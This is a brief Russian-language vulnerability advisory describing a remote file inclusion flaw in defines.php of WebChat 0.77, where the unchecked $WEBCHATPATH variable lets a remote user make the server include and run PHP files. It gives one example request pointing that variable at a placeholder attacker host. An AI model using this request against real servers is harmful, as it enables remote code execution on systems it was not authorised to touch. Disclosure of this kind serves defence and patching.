Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере.
Сценарий defines.php включает файлы db_mysql.php и
language/eng lish.php через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример:
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
где
http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.php
Уязвимость обнаружена в WebChat 0.77.